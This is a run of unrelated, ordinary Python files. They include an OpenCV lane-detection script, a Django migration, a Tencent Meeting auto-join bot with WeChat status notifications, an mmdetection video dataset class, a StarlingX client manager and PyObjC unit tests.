these apply the average of a the matrix blur_gray = cv2.GaussianBlur(gray,(kernel_size, kernel_size),0) #0 # Define our parameters for Canny and apply low_threshold = 30 #40 high_threshold = 90 #80 edges = cv2.Canny(blur_gray, low_threshold, high_threshold) return edges def mask_image(image): edge = gray(image) mask = np.zeros_like(cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)) ignore_mask_color = (255,255,255) imshape = image.shape y_upper = imshape[0]*0.65 y_bottom = imshape[0] #0.9Bottom is also chosen to avoid hood of the car x_left_upper = imshape[1]*0.4 x_right_upper = imshape[1]*0.6 vertices = np.array([[(imshape[1]*0.05,y_bottom),(x_left_upper, y_upper), (x_right_upper, y_upper),(imshape[1]*0.95,y_bottom)]], dtype=np.int32) cv2.fillPoly(mask, vertices, ignore_mask_color) masked_edges = cv2.bitwise_and(edge, mask) return masked_edges def lines_image(image): masked_edges = mask_image(image) rho = 1 #1 distance resolution in pixels of the Hough grid theta = np.pi/180 # angular resolution in radians of the Hough grid threshold = 20 #1 minimum number of votes (intersections in Hough grid cell) min_line_length = 5 #10 minimum number of pixels making up a line max_line_gap = 2 #2 maximum gap in pixels between connectable line segments lines = cv2.HoughLinesP(masked_edges, rho, theta, threshold, np.array([]),min_line_length, max_line_gap) # To see the Hough's marking uncomment the following """ edges = gray(image) line_image = np.copy(image)*0 for line in 
lines: for x1,y1,x2,y2 in line: h_lines = cv2.line(line_image,(x1,y1),(x2,y2),[0,0,255],3) color_edges = np.dstack((edges, edges, edges)) lines_edges = cv2.addWeighted(color_edges, 0.8, h_lines, 1, 0) cv2.imshow("h_lines",lines_edges) cv2.waitKey(0) cv2.destroyAllWindows() """ # Iterate over the output "lines" and draw lines on a blank image x_left = [] y_left = [] x_right = [] y_right = [] slope_left = [] slope_right = [] constant_left = [] constant_right = [] for line in lines: for x1,y1,x2,y2 in line: if x1 == x2: m = np.Infinity else: m = round(((-1)*(y2-y1)/(x2-x1)), 2) if m > 0.43 and m < 1.57: x_left.append(x1) y_left.append(y1) x_left.append(x2) y_left.append(y2) slope_left.append(m) c1 = round(y1 - m*x1,2) c2 = round(y2 - m*x2,2) constant_left.append(c1) constant_left.append(c2) elif m < -0.43 and m > -1.57: x_right.append(x1) y_right.append(y1) x_right.append(x2) y_right.append(y2) slope_right.append(m) c1 = round(y1 - m*x1,2) c2 = round(y2 - m*x2,2) constant_right.append(c1) constant_right.append(c2) else: None co_ordinates = [x_left, x_right, y_left, y_right, slope_left, slope_right, constant_left, constant_right] return co_ordinates def guide_lines(image): edges = gray(image) line_image = np.copy(image)*0 imshape = image.shape y_top = np.int32(imshape[0]*0.65) y_bottom = imshape[0] [x_left, x_right, y_left, y_right, slope_left, slope_right, constant_left, constant_right] = lines_image(image) left_slope = round(np.mean(slope_left),2) right_slope = round(np.mean(slope_right), 2) left_constant = round(np.mean(constant_left),2) right_constant = round(np.mean(constant_right), 2) cl = round(y_bottom - left_slope*275,2) cr = round(y_bottom - right_slope*1140,2) # These are used just for presepective #x_left_bottom = 275 #x_left_top = 520 #x_right_top = 720 #x_right_bottom = 1140 # The follwoing uses maximum conditon x_left_top = max(x_left) x_left_bottom = min(x_left) x_right_top = min(x_right) x_right_bottom = max(x_right) #The following uses the conditon y = m*x + c and ((y2-y1)/(x2-x1))= m """ x_left_bottom = np.float32(round(((y_bottom - left_constant))/left_slope ,2)) x_left_top = x_left_bottom - ((y_top-y_bottom)/left_slope) x_left_top = np.float32(round(x_left_top)) Righty x_right_bottom = np.float32(round((y_bottom - right_constant)/right_slope,2)) x_right_top = x_right_bottom - ((y_top-y_bottom)/right_slope) x_right_top = np.float32(round(x_right_top)) """ line_r = cv2.line(line_image, (x_right_bottom, imshape[0]), (x_right_top, y_top), (0, 0, 255), 10) #Plottin Left line on the above image line_LnR = cv2.line(line_r, (x_left_bottom, imshape[0]), (x_left_top, y_top), (0, 0, 255), 10) # Iterate over the output "lines" and draw lines on a blank image # Create a "color" binary image to combine with line image color_edges = np.dstack((edges, edges, edges)) # Draw the lines on the edge image lines_edges = cv2.addWeighted(color_edges, 0.8, line_LnR, 1, 0) return lines_edges file_name = "solidWhiteRight.mp4" #solidWhiteRight.mp4 solidYellowLeft.mp4 challenge.mp4 cap = cv2.VideoCapture(file_name) # Width of the frames in the video stream. 
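
# Aside (added note, not in the original script): the numeric property ids used below (3, 4 and 5)
# are the values of the named OpenCV constants cv2.CAP_PROP_FRAME_WIDTH, cv2.CAP_PROP_FRAME_HEIGHT
# and cv2.CAP_PROP_FPS, so the same reads can be written as, e.g., int(cap.get(cv2.CAP_PROP_FPS)).
# Note also that the loop below writes `frame` (the raw input) to the output file and compares
# cv2.waitKey(1) & 0xFF against the string "q"; writing `frame_out` and comparing against ord("q")
# is most likely the intended behaviour.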
frame_width = int(cap.get(3)) # Height of the frames in the video stream frame_height = int(cap.get(4)) #Frame rate fps = int(cap.get(5)) #4-character code of codec fourcc = (cv2.VideoWriter_fourcc('F','M','P','4')) out = cv2.VideoWriter('solidWhiteRightOut.mp4',fourcc, fps, (frame_width,frame_height)) while True: ret, frame = cap.read() if ret == True: frame_out = guide_lines(frame) out.write(frame) #print("in\n>", frame,"out\n>", frame_out) #Displyaing the resulting frame cv2.imshow("frame", frame_out) #Press Q to exit if cv2.waitKey(1) & 0XFF == ("q"): break else: break #When everything is done release the video capturing object and out object cap.release() out.release() cv2.destroyAllWindows() spec/data/observable_meta_spec.py1-10 import mock from data import observable_meta from spec.mamba import * with description('observable_meta'): with it('instantiates'): expect(observable_meta.ObservableMeta()).to(be_empty) with it('publishes changes'): m = observable_meta.ObservableMeta() observer = mock.Mock() m.subscribe(observer) expect(observer.on_next.call_count).to(equal(0)) m['something'] = 1 expect(observer.on_next.call_count).to(equal(1)) expect(observer.on_next.call_args).to(equal(mock.call(m))) # Generated by Django 3.2.8 on 2021-10-27 06:06 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): initial = True dependencies = [ ] operations = [ migrations.CreateModel( name='Matakuliah', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('nama', models.CharField(choices=[('Alin', 'Aljabar Linear'), ('MPPI', 'Metodologi Penelitian dan Penulisan Ilmiah'), ('PBP', 'Pemrograman Berbasis Platform'), ('SOSI', 'Sistem Operasi untuk Sistem Informasi'), ('SDA', 'Struktur Data & Algoritma')], max_length=200)), ('kelas', models.CharField(max_length=1)), ('SKS', models.CharField(max_length=1)), ], ), migrations.CreateModel( name='Jadwal', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('hari', models.CharField(choices=[('Senin', 'Senin'), ('Selasa', 'Selasa'), ('Rabu', 'Rabu'), ('Kamis', 'Kamis'), ('Jumat', 'Jumat')], max_length=10)), ('start', models.CharField(max_length=10)), ('end', models.CharField(max_length=10)), ('matkul', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='schedule_kuliah.matakuliah')), ], ), migrations.CreateModel( name='Dosen', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('nama', models.CharField(max_length=100)), ('nomor_telepon', models.CharField(max_length=13)), ('email', models.CharField(max_length=100)), ('matkul', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='schedule_kuliah.matakuliah')), ], ), ] import os import sys import pandas as pd import pyautogui import logging import urllib3 import time from datetime import datetime # 入会结果是否发送微信消息 sendResult = True # 微信绑定SDK(此处配置自己的SDK) sdk = '**********************' # 腾讯会议应用程序路径 meetPath = "D:/Program Files (x86)/Tencent/Meet/WeMeet/wemeetapp.exe" # 微信推送消息标题 successTitle = "入会成功!" failTitle = "入会失败!" 
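
# Aside (illustrative sketch, not part of the original script): the ServerChan push URLs assembled
# further down hand-encode spaces and line breaks as %20 and %0a%0d. The standard library can do this
# encoding instead; `build_push_url` is a hypothetical helper, not something this script defines.
from urllib.parse import quote

def build_push_url(sdk_key, title, desp):
    # Percent-encode the title and body so that spaces, newlines and non-ASCII text are URL-safe.
    return ("https://sc.ftqq.com/" + sdk_key + ".send"
            + "?title=" + quote(title)
            + "&desp=" + quote(desp))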
# logging.basicConfig(filename="server.log",filemode="w",format="[%(asctime)s]-[%(name)s]-[%(levelname)s] %(message)s",level=logging.INFO) # 创建一个logger logger = logging.getLogger('mylogger') logger.setLevel(logging.DEBUG) # 创建一个handler,用于写入日志文件 fh = logging.FileHandler('server.log') fh.setLevel(logging.DEBUG) # 再创建一个handler,用于输出到控制台 ch = logging.StreamHandler() ch.setLevel(logging.DEBUG) # 定义handler的输出格式 formatter = logging.Formatter("[%(asctime)s][%(thread)d][%(filename)s][line: %(lineno)d][%(levelname)s] ## %(message)s") fh.setFormatter(formatter) ch.setFormatter(formatter) # 给logger添加handler logger.addHandler(fh) logger.addHandler(ch) # 需要一个PoolManager实例来生成请求,由该实例对象处理与线程池的连接以及线程安全的所有细节,不需要任何人为操作: http = urllib3.PoolManager() global meetingState meetingState = False def getPath(filename): # 方法一(如果要将资源文件打包到app中,使用此法) bundle_dir = getattr(sys, '_MEIPASS', os.path.abspath(os.path.dirname(__file__))) path = os.path.join(bundle_dir, filename) return path # Excel文件路径 excelPath = getPath("meetingList.xlsx") df = pd.read_excel(excelPath) def signIn(meeting_id, password): # 从指定位置打开应用程序 os.startfile(meetPath) time.sleep(5) # 点击加入按钮 joinbtn = pyautogui.locateCenterOnScreen(getPath("buttons/joinameeting.png")) pyautogui.moveTo(joinbtn) pyautogui.click() time.sleep(2) # 输入会议 ID try: meetingidbtn = pyautogui.locateCenterOnScreen(getPath("buttons/meetingId.png")) pyautogui.moveTo(meetingidbtn) pyautogui.write(meeting_id) time.sleep(2) except: meetingidbtn = pyautogui.locateCenterOnScreen(getPath("buttons/inputMeetingId.png")) pyautogui.moveTo(meetingidbtn) pyautogui.write(meeting_id) time.sleep(2) # 关闭视频和音频 try: mediaBtn = pyautogui.locateAllOnScreen(getPath("buttons/media.PNG")) pyautogui.moveTo(mediaBtn) pyautogui.click() except: logger.info("入会开启摄像头已关闭,无需自动取消。") try: audioBtn = pyautogui.locateAllOnScreen(getPath("buttons/audio.PNG")) pyautogui.moveTo(audioBtn) pyautogui.click() time.sleep(2) except: logger.info("入会开启麦克风已关闭,无需自动取消。") # 加入 join = pyautogui.locateCenterOnScreen(getPath("buttons/join.PNG")) pyautogui.moveTo(join) pyautogui.click() time.sleep(2) # 输入密码以加入会议 passcode = pyautogui.locateCenterOnScreen(getPath("buttons/meetingPasscode.PNG")) pyautogui.moveTo(passcode) pyautogui.write(password) time.sleep(1) # 点击加入按钮 joinmeeting = pyautogui.locateCenterOnScreen(getPath("buttons/joinmeeting.PNG")) pyautogui.moveTo(joinmeeting) pyautogui.click() time.sleep(2) def signInExcelMeeting(): now = datetime.now().strftime("%Y-%m-%d %H:%M") if now in str(df['Timings']): mylist = df["Timings"] mylist = [i.strftime("%Y-%m-%d %H:%M") for i in mylist] c = [i for i in range(len(mylist)) if mylist[i] == now] row = df.loc[c] meeting_id = str(row.iloc[0, 1]) password = str(row.iloc[0, 2]) global meetingTitle, meetingTime, meetingId meetingTitle = str(row.iloc[0, 3]) meetingTime = str(row.iloc[0, 0]).replace(" ", "%20") meetingId = str(row.iloc[0, 1]) time.sleep(5) try: signIn(meeting_id, password) time.sleep(2) logger.info(meeting_id + ":" + meetingTitle + " " + successTitle) meetingState = True if sendResult == True: logger.info("开始推送微信状态...") try: url = 'https://sc.ftqq.com/' + sdk + \ ".send?title=" + meetingTitle + "%20%20" + successTitle + \ "&desp=会议信息如下:" \ "%0a%0d会议时间:" + meetingTime + \ "%0a%0d会议号:" + meetingId + \ "%0a%0d会议主题:" + meetingTitle # 通过request()方法创建一个请求,该方法返回一个HTTPResponse对象: r = http.request('GET', url) logger.info("微信消息发送成功。") except Exception as e: logger.info("微信推送失败。") logger.exception(e.args) else: logger.info("配置为不推送微信状态。") except: logger.info(meeting_id + failTitle) if sendResult 
== True: logger.info("开始推送微信状态...") try: url = "https://sc.ftqq.com/" + sdk + \ ".send?title=" + meetingTitle + "%20%20" + failTitle + \ "&desp=会议信息如下:" \ "%0a%0d会议时间:" + meetingTime + \ "%0a%0d会议号:" + meetingId + \ "%0a%0d会议主题:" + meetingTitle logger.info(url) # 通过request()方法创建一个请求,该方法返回一个HTTPResponse对象: r = http.request('GET', url) logger.info("微信消息发送成功。") except Exception as e: logger.info("微信推送失败。") logger.exception(e.args) else: logger.info("配置为不推送微信状态。") def quitMeeting(): try: quitBtn = pyautogui.locateCenterOnScreen(getPath("buttons/quitMeeting.png")) pyautogui.moveTo(quitBtn) pyautogui.click() except: logger.error("未找到离开会议按钮。") time.sleep(2) if sendResult: logger.info("开始推送微信状态...") now = datetime.now().strftime("%Y-%m-%d %H:%M:%S").replace(" ", "%20") try: url = "https://sc.ftqq.com/" + sdk + \ ".send?title=" + meetingTitle + "%20%20已结束" + \ "&desp=会议信息如下:" \ "%0a%0d会议时间:" + meetingTime + \ "%0a%0d会议号:" + meetingId + \ "%0a%0d会议主题:" + meetingTitle + \ "%0a%0d会议结束时间:" + now # 通过request()方法创建一个请求,该方法返回一个HTTPResponse对象: r = http.request('GET', url) logger.info("微信消息发送成功。") except Exception as e: logger.info("微信推送失败。") logger.exception(e.args) else: logger.info("配置为不推送微信状态。") while True: # To get current time now = datetime.now().strftime("%Y-%m-%d %H:%M") logger.info("当前时间:" + now) signInExcelMeeting() quitBtn = pyautogui.locateCenterOnScreen(getPath("buttons/quitMeeting.png")) userSize = pyautogui.locateCenterOnScreen(getPath("buttons/userSize.png")) thanks = pyautogui.locateCenterOnScreen(getPath("buttons/thanks.png")) # 存在退出按钮和人数37 或者 存在退出按钮和感谢话语 if (quitBtn != None and userSize != None and meetingState) or (quitBtn != None and thanks != None and meetingState): quitMeeting() else: if meetingState: logger.info("会议未结束。") elif meetingState == False: logger.info("无正在进行中的会议。") time.sleep(60) lib/reinteract/iter_copy_from.py1-10 # Copyright 2007 # # This file is part of Reinteract and distributed under the terms # of the BSD license. See the file COPYING in the Reinteract # distribution for full details. # ######################################################################## import gtk from ctypes import * # This works around a hole in the pygtk API, see: # # http://bugzilla.gnome.org/show_bug.cgi?id=481715 # # In theory, it's relatively robust against different architectures, # and even the more probable changes between GTK+/pygtk/Python versions, # but there's a lot that could go wrong. 
class _GtkTextIter(Structure): _fields_ = [ ("dummy1", c_void_p), ("dummy2", c_void_p), ("dummy3", c_int), ("dummy4", c_int), ("dummy5", c_int), ("dummy6", c_int), ("dummy7", c_int), ("dummy8", c_int), ("dummy9", c_void_p), ("dummy10", c_void_p), ("dummy11", c_int), ("dummy12", c_int), ("dummy13", c_int), ("dummy14", c_void_p) ] class _PyGBoxed_TextIter(Structure): _fields_ = [ ("PyObject_HEAD", c_byte * object.__basicsize__), ("boxed", POINTER(_GtkTextIter) ) ] def iter_copy_from(iter, other): iter_ctypes = _PyGBoxed_TextIter.from_address(id(iter)).boxed.contents other_ctypes = _PyGBoxed_TextIter.from_address(id(other)).boxed.contents for name, type in iter_ctypes._fields_: iter_ctypes.__setattr__(name, other_ctypes.__getattribute__(name)) import os.path as osp import mmcv import numpy as np import torch from torch.utils.data import Dataset from IPython import embed from .pipelines import Compose, FlowAug from .registry import DATASETS @DATASETS.register_module class VideoCustomDataset(Dataset): """ Custom dataset for video detection/tracking Annotation format: [ { 'video_name': '0000', 'img_size': (370, 1224), 'flow_size': (370, 1224), 'quantization': False, 'frames': [ { 'filename': 'training/image_02/0000/000000.png', 'flow_name': 'training/Flow/0000/000000.flo', 'inv_flow_name': 'training/Inv_Flow/0000/000000.flo', 'is_annotated': True, 'intrinsic': (optional), 'ann': { 'bboxes': (n, 4), 'labels': (n, ), 'track_id': (n, ), ... } }, ... ] }, ... ] """ CLASSES = None def __init__(self, ann_file, pipeline, seq_len=5, padding=False, data_root=None, img_prefix='', seg_prefix=None, proposal_file=None, test_mode=False,): super(VideoCustomDataset, self).__init__() self.seq_len = seq_len self.padding = padding self.ann_file = ann_file self.data_root = data_root self.img_prefix = img_prefix self.seg_prefix = seg_prefix self.proposal_file = proposal_file self.test_mode = test_mode # join paths if data_root is specified if self.data_root is not None: if not osp.isabs(self.ann_file): self.ann_file = osp.join(self.data_root, self.ann_file) if not (self.img_prefix is None or osp.isabs(self.img_prefix)): self.img_prefix = osp.join(self.data_root, self.img_prefix) if not (self.seg_prefix is None or osp.isabs(self.seg_prefix)): self.seg_prefix = osp.join(self.data_root, self.seg_prefix) if not (self.proposal_file is None or osp.isabs(self.proposal_file)): self.proposal_file = osp.join(self.data_root, self.proposal_file) # load annotations self.video_infos = self.load_annotations(self.ann_file) self.sample_list = [] for vid, video_info in enumerate(self.video_infos): n_frames = len(video_info['frames']) if self.padding: for i in range(n_frames): self.sample_list.append((vid, i)) else: for i in range(n_frames - self.seq_len + 1): self.sample_list.append((vid, i)) if not self.test_mode: self.flag = np.zeros(len(self), dtype=np.uint8) # processing pipeline self.pipeline = Compose(pipeline) def __len__(self): return len(self.sample_list) def __getitem__(self, idx): if self.test_mode: return self.perpare_clip_test(idx) while True: data = self.prepare_clip_train(idx) if data is None: idx = self._rand_another(idx) continue return data def _rand_another(self, idx): pool = range(len(self)) ret = np.random.choice(pool) while ret == idx: ret = np.random.choice(pool) return ret def load_annotations(self, ann_file): return mmcv.load(ann_file) def prepare_clip_test(self): pass def prepare_clip_train(self, idx): vid, fid = self.sample_list[idx] video = self.video_infos[vid] frames = video['frames'] quantize = 
video['quantize'] if self.padding: pass else: frames = frames[fid: fid + self.seq_len] # img_names = [x['filename'] for x in frames] flows = [mmcv.flowread(osp.join(self.img_prefix, x['flow_name']), quantize=quantize) for x in frames] inv_flows = [mmcv.flowread(osp.join(self.img_prefix, x['inv_flow_name']), quantize=quantize) for x in frames] img_results = [self.prepare_img_train(frame) for frame in frames] # results encode the transformation info of img # augment the flow/inv_flow accordingly, pack it into results # resize => flip => pad for i, x in enumerate(img_results): if x is None: return None aug_meta = img_results[0]['img_meta'].data resize = aug_meta['img_shape'][:2] pad = aug_meta['pad_shape'][:2] flip = aug_meta['flip'] flow_aug = FlowAug(resize, pad, flip) flows = [torch.tensor(x).permute(2, 0, 1) for x in flows] inv_flows = [torch.tensor(x).permute(2, 0, 1) for x in inv_flows] flows = torch.stack(flows) inv_flows = torch.stack(inv_flows) flows, inv_flows = flow_aug(flows, inv_flows) for idx, img_result in enumerate(img_results): # if not isinstance(img_result, dict): # print("Debug") # print(img_result) # print(frames[idx]) # print(frames) img_result['flow'] = flows[idx] img_result['inv_flow'] = inv_flows[idx] # embed() return img_results def get_ann_info(self, frame): ann = frame['ann'] for k, v in ann.items(): if isinstance(v, list): if 'bbox' in k: ann[k] = np.array(v, dtype=np.float32).reshape(-1, 4) else: ann[k] = np.array(v, dtype=np.int64) return ann def pre_pipeline(self, results): results['img_prefix'] = self.img_prefix results['seg_prefix'] = self.seg_prefix results['proposal_file'] = self.proposal_file results['bbox_fields'] = [] results['mask_fields'] = [] def prepare_img_train(self, frame): img_info = frame ann_info = self.get_ann_info(frame) results = dict(img_info=img_info, ann_info=ann_info) self.pre_pipeline(results) results = self.pipeline(results) return results if __name__ == '__main__': data_root = '/databack1/KITTI/kitti/tracking/' img_norm_cfg = dict( mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True) train_pipeline = [ dict(type='LoadImageFromFile'), dict(type='LoadAnnotations', with_bbox=True), dict(type='Resize', img_scale=(1333, 800), keep_ratio=True), dict(type='RandomFlip', flip_ratio=0.5), dict(type='Normalize', **img_norm_cfg), dict(type='Pad', size_divisor=32), dict(type='DefaultFormatBundle'), dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']), ] train = dict( ann_file=data_root + 'training/kitti_train_tracking.json', img_prefix=data_root, pipeline=train_pipeline) dataset = VideoCustomDataset(**train) embed() # -*- coding: utf-8 -*- """ Authors: Module: Products/GridSoils Description: This product will calculate soil properties by using the GridSoils as basis. Different soil characteristics can be estimated. 
The formulas are taken from the SoMoi model and the SoilGrids are taken from: ftp.soilgrids.org """ from watertools.Products.SoilGrids import K_Sat from watertools.Products.SoilGrids import Theta_FC from watertools.Products.SoilGrids import Theta_Sat from watertools.Products.SoilGrids import Theta_Sat2 from watertools.Products.SoilGrids import Theta_Res from watertools.Products.SoilGrids import Water_Holding_Capacity from watertools.Products.SoilGrids import n_van_genuchten __all__ = ['K_Sat', 'Theta_FC', 'Theta_Sat', 'Theta_Sat2', 'Theta_Res', 'Water_Holding_Capacity', 'n_van_genuchten'] __version__ = '0.1' sysinv/cgts-client/cgts-client/cgtsclient/v1/interface_datanetwork.py1-10 # # Copyright (c) 2019 Wind River Systems, Inc. # # SPDX-License-Identifier: Apache-2.0 # # -*- encoding: utf-8 -*- # from cgtsclient.common import base from cgtsclient import exc CREATION_ATTRIBUTES = [ 'interface_uuid', 'datanetwork_uuid' ] class InterfaceDataNetwork(base.Resource): def __repr__(self): return "" % self._info class InterfaceDataNetworkManager(base.Manager): resource_class = InterfaceDataNetwork def list(self): path = '/v1/interface_datanetworks' return self._list(path, "interface_datanetworks") def list_by_host(self, host_uuid): path = '/v1/ihosts/%s/interface_datanetworks' % host_uuid return self._list(path, "interface_datanetworks") def list_by_interface(self, interface_uuid): path = '/v1/iinterfaces/%s/interface_datanetworks' % interface_uuid return self._list(path, "interface_datanetworks") def get(self, interface_datanetwork_uuid): path = '/v1/interface_datanetworks/%s' % interface_datanetwork_uuid try: return self._list(path)[0] except IndexError: return None def assign(self, **kwargs): path = '/v1/interface_datanetworks' new = {} for (key, value) in kwargs.items(): if key in CREATION_ATTRIBUTES: new[key] = value else: raise exc.InvalidAttribute('%s' % key) return self._create(path, new) def remove(self, interface_datanetwork_uuid): path = '/v1/interface_datanetworks/%s' % interface_datanetwork_uuid return self._delete(path) def get_datanetwork_names(cc, interface): datanetwork_names = [] ifdns = cc.interface_datanetwork.list_by_interface(interface.uuid) for ifdn in ifdns: datanetwork_names.append(getattr(ifdn, 'datanetwork_name')) return datanetwork_names src/expensetracker/run.py from aiohttp import web routes = web.RouteTableDef() @routes.get("/") async def handle(request): name = request.match_info.get("name", "Anonymous") text = f"Hello {name}" return web.Response(text=text) app = web.Application() app.add_routes(routes) if __name__ == "__main__": web.run_app(app) from PyObjCTools.TestSupport import * from AppKit import * try: unicode except NameError: unicode = str class TestNSOutlineViewHelper (NSObject): def outlineView_sizeToFitWidthOfColumn_(self, v, c): return 1 def outlineView_shouldReorderColumn_toColumn_(self, v, c1, c2): return 1 def outlineView_shouldShowOutlineCellForItem_(self, v, i): return 1 def outlineView_child_ofItem_(self, ov, nr, item): return 1 def outlineView_isItemExpandable_(self, ov, item): return 1 def outlineView_numberOfChildrenOfItem_(self, ov, item): return 1 def outlineView_objectValueForTableColumn_byItem_(self, ov, tc, item): return 1 def outlineView_setObjectValue_forTableColumn_byItem_(self, ov, value, tc, item): pass def outlineView_itemForPersistentObject_(self, ov, po): return 1 def outlineView_persistentObjectForItem_(self, ov, item): return 1 def outlineView_sortDescriptorsDidChange_(self, ov, old): pass def 
outlineView_writeItems_toPasteboard_(self, ov, items, pb): return 1 def outlineView_validateDrop_proposedItem_proposedChildIndex_(self, ov, dr, item, idx): return 1 def outlineView_acceptDrop_item_childIndex_(self, ov, dr, it, idx): return 1 def outlineView_namesOfPromisedFilesDroppedAtDestination_forDraggedItems_(self, ov, dr, it): return 1 def outlineView_willDisplayCell_forTableColumn_item_(self, ov, c, tc, i): pass def outlineView_shouldEditTableColumn_item_(self, ov, tc, i): return 1 def selectionShouldChangeInOutlineView_(self, ov): return 1 def outlineView_selectionIndexesForProposedSelection_(self, ov, idx): return 1 def outlineView_shouldSelectItem_(self, ov, tc): return 1 def outlineView_shouldSelectTableColumn_(self, ov, tc): return 1 def outlineView_toolTipForCell_rect_tableColumn_item_mouseLocation_(self, ov, c, r, tc, it, ml): return 1 def outlineView_heightOfRowByItem_(self, ov, item): return 1 def outlineView_typeSelectStringForTableColumn_item_(self, ov, tc, item): return 1 def outlineView_nextTypeSelectMatchFromItem_toItem_forString_(self, ov, si, ei, ss): return 1 def outlineView_shouldTypeSelectForEvent_withCurrentSearchString_(self, ov, ev, ss): return 1 def outlineView_shouldShowCellExpansionForTableColumn_item_(self, ov, tc, it): return 1 def outlineView_shouldTrackCell_forTableColumn_item_(self, ov, c, tc, it): return 1 def outlineView_dataCellForTableColumn_item_(self, ov, tc, it): return 1 def outlineView_isGroupItem_(self, ov, item): return 1 def outlineView_shouldExpandItem_(self, ov, it): return 1 def outlineView_shouldCollapseItem_(self, ov, it): return 1 def outlineView_willDisplayOutlineCell_forTableColumn_item_(self, ov, c, tc, i): pass def outlineView_draggingSession_willBeginAtPoint_(self, a, b, c): pass def outlineView_draggingSession_endedAtPoint_(self, a, b, c): pass class TestNSOutlineView (TestCase): def testConstants(self): self.assertEqual(NSOutlineViewDropOnItemIndex, -1) self.assertIsInstance(NSOutlineViewSelectionDidChangeNotification, unicode) self.assertIsInstance(NSOutlineViewColumnDidMoveNotification, unicode) self.assertIsInstance(NSOutlineViewColumnDidResizeNotification, unicode) self.assertIsInstance(NSOutlineViewSelectionIsChangingNotification, unicode) self.assertIsInstance(NSOutlineViewItemWillExpandNotification, unicode) self.assertIsInstance(NSOutlineViewItemDidExpandNotification, unicode) self.assertIsInstance(NSOutlineViewItemWillCollapseNotification, unicode) self.assertIsInstance(NSOutlineViewItemDidCollapseNotification, unicode) def testMethods(self): self.assertResultIsBOOL(NSOutlineView.isExpandable_) self.assertArgIsBOOL(NSOutlineView.expandItem_expandChildren_, 1) self.assertArgIsBOOL(NSOutlineView.collapseItem_collapseChildren_, 1) self.assertArgIsBOOL(NSOutlineView.reloadItem_reloadChildren_, 1) self.assertResultIsBOOL(NSOutlineView.isItemExpanded_) self.assertResultIsBOOL(NSOutlineView.indentationMarkerFollowsCell) self.assertArgIsBOOL(NSOutlineView.setIndentationMarkerFollowsCell_, 0) self.assertResultIsBOOL(NSOutlineView.autoresizesOutlineColumn) self.assertArgIsBOOL(NSOutlineView.setAutoresizesOutlineColumn_, 0) self.assertResultIsBOOL(NSOutlineView.shouldCollapseAutoExpandedItemsForDeposited_) self.assertArgIsBOOL(NSOutlineView.shouldCollapseAutoExpandedItemsForDeposited_, 0) self.assertResultIsBOOL(NSOutlineView.autosaveExpandedItems) self.assertArgIsBOOL(NSOutlineView.setAutosaveExpandedItems_, 0) def testProtocols(self): self.assertArgHasType(TestNSOutlineViewHelper.outlineView_child_ofItem_, 1, objc._C_NSInteger) 
self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_isItemExpandable_) self.assertResultHasType(TestNSOutlineViewHelper.outlineView_numberOfChildrenOfItem_, objc._C_NSInteger) self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_writeItems_toPasteboard_) self.assertResultHasType(TestNSOutlineViewHelper.outlineView_validateDrop_proposedItem_proposedChildIndex_, objc._C_NSUInteger) self.assertArgHasType(TestNSOutlineViewHelper.outlineView_validateDrop_proposedItem_proposedChildIndex_, 3, objc._C_NSInteger) self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_shouldEditTableColumn_item_) self.assertResultIsBOOL(TestNSOutlineViewHelper.selectionShouldChangeInOutlineView_) self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_shouldSelectItem_) self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_shouldSelectTableColumn_) self.assertArgHasType(TestNSOutlineViewHelper.outlineView_toolTipForCell_rect_tableColumn_item_mouseLocation_, 2, b'N^' + NSRect.__typestr__) self.assertArgHasType(TestNSOutlineViewHelper.outlineView_toolTipForCell_rect_tableColumn_item_mouseLocation_, 5, NSPoint.__typestr__) self.assertResultHasType(TestNSOutlineViewHelper.outlineView_heightOfRowByItem_, objc._C_CGFloat) self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_shouldExpandItem_) self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_shouldCollapseItem_) @min_os_level('10.5') def testProtocols10_5(self): self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_shouldTypeSelectForEvent_withCurrentSearchString_) self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_shouldShowCellExpansionForTableColumn_item_) self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_shouldTrackCell_forTableColumn_item_) self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_isGroupItem_) @min_os_level('10.6') def testProtocols10_6(self): self.assertResultHasType(TestNSOutlineViewHelper.outlineView_sizeToFitWidthOfColumn_, objc._C_CGFloat) self.assertArgHasType(TestNSOutlineViewHelper.outlineView_sizeToFitWidthOfColumn_, 1, objc._C_NSInteger) self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_shouldReorderColumn_toColumn_) self.assertArgHasType(TestNSOutlineViewHelper.outlineView_shouldReorderColumn_toColumn_, 1, objc._C_NSInteger) self.assertArgHasType(TestNSOutlineViewHelper.outlineView_shouldReorderColumn_toColumn_, 2, objc._C_NSInteger) self.assertResultIsBOOL(TestNSOutlineViewHelper.outlineView_shouldShowOutlineCellForItem_) @min_os_level('10.7') def testProtocols10_7(self): self.assertArgHasType(TestNSOutlineViewHelper.outlineView_draggingSession_willBeginAtPoint_, 2, NSPoint.__typestr__) self.assertArgHasType(TestNSOutlineViewHelper.outlineView_draggingSession_endedAtPoint_, 2, NSPoint.__typestr__) if __name__ == "__main__": main() from django import forms from apps.users.models import InterestedParty from registration.forms import RegistrationFormUniqueEmail from django.contrib.auth.forms import AuthenticationForm from django.contrib.auth import authenticate from django.contrib.auth.models import User import pytz zones = pytz.common_timezones zones = [z for z in zones if z.startswith('US')] + [z for z in zones if not z.startswith('US')] class 